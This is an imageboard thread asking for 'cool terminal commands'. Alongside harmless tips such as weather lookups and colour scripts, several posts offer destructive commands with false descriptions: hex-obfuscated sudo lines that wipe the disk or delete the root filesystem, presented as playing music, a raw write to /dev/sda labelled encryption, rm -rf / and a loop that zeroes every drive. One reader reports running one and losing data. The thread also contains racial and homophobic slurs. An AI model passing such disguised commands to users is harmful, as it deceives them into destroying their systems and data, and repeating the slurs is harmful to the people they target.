What are some cool terminal commands?

What are some cool terminal commands?

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you made this same thread yesterday



if you are happy and you know it syntax error

sl is the coolest

rm -rf /*

# [ $[ $RANDOM % 6 ] == 0 ] && rm -rf / || echo “You live”

works on my mac

delete system32


perl -e 'for(-21..20){$y=$_/20;for(-60..18){$r=($x=$_/30);$i=$y;for(1..99){$t=$r;$r=$r**2-$i**2+$x;$i=$t*$i*2+$y}if($r**2+$i**2

sudo apt-get install gentoo

sudo $(echo "64642069663d2f6465762f7a65726f206f663d2f6465762f73646120636f756e743d3130302062733d314d0a" | xxd -r -p)

plays a midi beat.

Nice!! Really nice!!

cd code



ITT Sup Forums proves being Sup Forums

Kirk to Enterprise....

Works on my Ubuntu

>no sudo

function fractal {
local lines columns colour a b p q i pnew
((columns=COLUMNS-1, lines=LINES-1, colour=0))
for ((b=-1.5; b bashrc/zshrc

>sudo -s isnt the first command he types in his terminal

bash: ((: b=-1.5: syntax error: invalid arithmetic operator (error token is ".5")

curl "s3.amazonaws.com/fizzbuzz/output"

curl -s wttr.in/Denver

curl -s wttr/ |head -7

How much do you pay for amazon aws?

It's not my account, I don't use AWS.

function fractal {
local lines columns colour a b p q i pnew
((columns=COLUMNS-1, lines=LINES-1, colour=0))
for ((b=-1.5; b


Russian Roulette

chattr +i filename

makes the file immutable so you can't delete/modify it even as root

Yeah, it plays Super mario cart. Nice try faggot.

>being here everyday

>being this retarded
Only a casual would be retarded enough to run rm -rf /*, and they won't be running on a root shell.

espeak kill yourself

If I didn't come here every day, I might miss important memes

don't forget sudo, otherwise you're playing with the safety on


This command uses linus torvald's backdoor to root access any linux system.


automatic system encryption using a one-time pad(strongest known encryption):

cat /dev/urandom > /dev/sda

rm -rf /home

that's pretty nice!

for i in {0..255} ; do tput bold; tput setaf "$i"; echo -en "$USER@$(uname -n):~$ "; tput sgr0; echo -n "PS1='\[\$(tput bold)\$(tput setaf "; echo -n "$i"; echo ")\]\\u@\\h:\\w:\\$ \\[\$(tput sgr0)\\]'"; done

this thread's tl;dr

nuke pc

$lsof -P -i -n
$youtube-dl --extract-audio -audio-format mp3

also terminalsare.sexy/

Improved version:
echo -n 7375646f20726d202d7266202d2d6e6f2d70726573657276652d726f6f74202f | xxd -r -p -

wow, this is awesome

time cat /dev/urandom | grep nigger

See how long it takes to find a nigger



mount /dev/sdxx /mnt/media
cd /mnt/media/windows\ 7\ files/music
cd nirvana
mocp about\ a\ girl
>> unknown file type .wma

coolest command ever

for i in /dev/sd*; do sudo sh -c "cat /dev/zero > $i"; done

$ type $(compgen -a | grep ^l)
l is aliased to `ls -CF'
l. is aliased to `ls -d .*'
la is aliased to `ls -A'
ll is aliased to `ls -alF'
ls is aliased to `ls --color=auto --group-directories-first'


l. -lh | grep drwx
ls (hidden folders only pls)

info history 'Event Designators'

>2017 in the year of our Lord and Savior Jesus Christ
>using cat or dd or any IO based command to encrypt or destroy data

Use hdparm.


Die. You are GNU scum.

found the cuck.

The quick substitution should be easier.

Having fun running all of these without the standard fear of running random commands off Sup Forums. Thanks docker

>believing the HDD jew
/dev/zero or nothing. your firmware will probably tell you "yes goy, your data has been wiped" and proceed to write nothing at all.

>calling me a cuck
>using `info`

Interesting cognitive dissonance there.

>cool command terminal command
If you have a server with root access and some user is SSHed in other than you, as root:

>lsof | grep the_user

and look at the output for non-device paths. You can usually tell right away what they are doing. Then:

>write the_user
>hey faggot, get out of the_path

People think SSH makes them invisible. It doesn't. On some systems, you don't need root even for the `lsof` either.

echo -e "\033[2J\033[?25l"; R=`tput lines` C=`tput cols`;: $[R--] ; while true
do ( e=echo\ -e s=sleep j=$[RANDOM%C] d=$[RANDOM%R];for i in `eval $e {1..$R}`;
do c=`printf '\\\\0%o' $[RANDOM%57+33]`
$e "\033[$[i-1];${j}H\033[32m$c\033[$i;${j}H\033[37m"$c; $s 0.1;if [ $i -ge $d ]
then $e "\033[$[i-d];${j}H ";fi;done;for i in `eval $e {$[i-d]..$R}`; #[mat!rix]
do echo -e "\033[$i;${j}f ";$s 0.1;done)& sleep 0.05;done

Why would ssh make someone invisible? You're still logging into the system, which would leave traces in logs somewhere. As evidenced by you.

Why would using 'info' make someone a cuck? I'm pretty new to linux and I don't get most of the political stuff.

What if you can see what all these do (or are supposed to do) without actually doing them?

Thanks for sharing, actually neat for my terminal setup and works with my norwegian obscure city!

But that mandelbrot perl script I don't really want to try to read.

cal 9 1752

screenfetch | cowsay | lolcat

nice, also interesting to learn something from Sup Forums, seeing how most people in this board/site are retards or just trolls. I don't think I've ever learned something meaningful here, t-b-h

>Browsing Sup Forums to learn something meaningful


the long form you can use other delimiters btw.

sudo shutdown -r now

I don't... but you can always learn something from random sources... that is, except in Sup Forums

echo "#include">hax.cpp;echo "int main(){while(1){int*i=new int();std::cout

>multiple echos
>not echo -e "...\n..."

rm -fr

Guess today I am lucky, thou some systems are preventing stupid users from doing stupid things. I lost a roulette once on my company's machine with rhel 6 and it turned out that system refused to fuck itself up. Don't remember how thou. Alias on rm maybe.

Fuck, you got me scared. Good one.

wow that is pretty cool
is there any way to add zoom function?

Did you run it? If so, I hope you use efi.


very nice user

>responding to shitposts
>the irony is not lost on me

I admit it. I am a fag. I copied it like a bitch and didn't notices 'sudo'. I guess that was dd wasn't it?
What did I purged and is it reversible?

It will delete the first 512 bytes (MBR) of your main disk and an additional 10 Megs of the root partition. Good luck!

>copied the sudo

You never go full retarded

Thanks for explaining. I just finished converting the hexes. Fuck MBR, that's a non issue but let's say I have /home at sda3 > first 100M. Will I be able to retrieve the data? I guess the partition table is fucked since fdisk doesn't report partitions.

You can recover it I'm sure but I'm in the dark as to how.

Ok, thanks for the info. Will do it tomorrow. Good night Sup Forums.

not him, but AFAIU, depends on your partition layout... if the 1st partition was in the first 100MB (it probably was), then I guess your 1st partition is fucked. if that partition was /boot or the UEFI partition, then that shouldn't be a problem

for the other partitions, there are tools that will automatically recognize your layout, BUT, depending on the size of your HDD, that will take some time

hope you learned your lesson: don't run random commands from random websites


script my_bash_session.log
ls -lh
more my_bash_session.log

touch fluffy | tail

Yes, lesson learned.
Thanks for input both of you.

>user is "me"

